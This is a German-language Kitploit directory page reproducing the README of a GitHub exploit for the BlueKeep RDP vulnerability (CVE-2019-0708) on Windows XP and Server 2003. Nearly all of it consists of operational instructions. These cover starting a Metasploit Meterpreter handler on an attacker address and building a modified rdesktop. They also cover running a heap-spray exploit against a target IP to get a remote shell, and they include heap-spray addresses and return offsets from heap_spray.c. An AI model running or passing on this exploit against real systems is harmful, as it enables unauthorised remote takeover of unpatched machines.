Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2019-0708_bluekeep_rce — es funktioniert auf XP (allen Versionen SP2 SP3) | Kitploit
Tools/GitHubGitHub/coolboy4me/cve-2019-0708_bluekeep_rce
SchwachstellenanalyseExploitationShellcodePenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubcoolboy4me/cve-2019-0708_bluekeep_rce

cve-2019-0708_bluekeep_rce

es funktioniert auf XP (allen Versionen SP2 SP3)

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
7514vor 6 JahrenVon Kitploit geprüft
  1. Führe msfconsole meterpreter/multi/handler aus, um auf 192.168.116.133:6000 zu lauschen.
  2. cd rdesktop-1.5.0 && make
  3. Ändere die Konfiguration, um die Rückverbindungs-IP und den Port festzulegen: 192.168.116.133 6000
  4. Führe ./heap_spray 192.168.116.134 aus (134 ist die Adresse von XP, RAM >= 2 GB).
  5. msfconsole meterpreter erhält eine Session.

PS: shellcode/shellcode.asm ist der Quellcode des Kernel-Shellcodes. Nach dem Kompilieren in Binärform wird die Datei rdesktop-1.5.0\cf517d077e9c152120787eb6b251615b erstellt, die beim make direkt in das Programm eingebunden wird.

Derzeit wird nur XP unterstützt, XP benötigt RAM >= 2 GB.

Falls Unterstützung für 2003 benötigt wird, muss das HEAP_SPRAY_ADDRESS-Makro in heap_spray.c angepasst werden. Nach wiederholten Tests variiert diese Adresse je nach 2003-Systemversion und RAM-Größe. Wenn du jedoch auf deinem eigenen Rechner testest, kann der Exploit auf 2003 erfolgreich sein. Die Lösung ist nicht universell einsetzbar.

heap_spray.c:

root@kitploit:~
#ifdef _2003

#define HEAP_SPRAY_ADDRESS 0x953b09c0				// Muss die Adresse des Heap-Spray-Shellcodes selbst über Windbg debuggen. Falls jemand eine universelle Lösung findet, bitte Issue einreichen.

#define IcaChannelInputInternal_RET_OFFSET 0x268

#else

#define IcaChannelInputInternal_RET_OFFSET 0x274

#define HEAP_SPRAY_ADDRESS 0x88c969c0

#endif

Test für 2003:

  1. Führe msfconsole meterpreter/multi/handler aus, um auf 192.168.116.133:6000 zu lauschen.
  2. cd rdesktop-1.5.0 && make
  3. Ändere die Konfiguration, um die Rückverbindungs-IP und den Port festzulegen: 192.168.116.133 6000
  4. Führe ./_2003_heap_spray 192.168.116.135 aus (135 ist die Adresse von 2003, RAM >= 2 GB).
  5. msfconsole meterpreter erhält eine Session.

login

Tool herunterladen